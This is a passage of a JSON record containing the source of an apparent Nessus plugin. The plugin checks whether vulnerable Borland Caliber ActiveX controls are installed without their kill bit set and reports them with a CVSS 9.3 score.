Locate the file used by the controls.\nclsids = make_list(\n \"{4610E7BF-710F-11D3-813D-00C04F6B92D0}\", # Borland Caliber\n \"{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\"\n);\n\ninfo = \"\";\ninstalls = 0;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n\n if (!file) continue;\n\n installs++;\n\n # Get its version.\n version = activex_get_fileversion(clsid:clsid);\n if (isnull(version))\n {\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n }\n\n if (version == '') version = 'unknown';\n\n # And check it.\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += \n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n }\n}\nactivex_end();\nif (!installs) exit(0, 'None of the affected CLSIDs were found on the remote host.');\n\n\n# Report findings.\nif (info)\n{\n # At this point, we want to know how many *vulnerable* installs there are.\n installs = max_index(split(info)) / 4;\n\n if (report_paranoia > 1)\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bit was set' +\n '\\nfor the control\\'s CLSID because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n else\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bits were set' +\n '\\nfor the controls\\' CLSIDs because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n }\n else\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nMoreover, its kill bit is not set so it is accessible via Internet' +\n '\\nExplorer.\\n';\n else\n report = info +\n '\\n' +\n '\\nMoreover, their kill bits are not set so they are accessible via' +\n '\\nInternet Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n}\nelse \n{\n if (installs == 1) exit(0, 'One of the controls is installed but its kill bit is set.');\n else exit(0, 'The controls are installed but their kill bits are set.');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
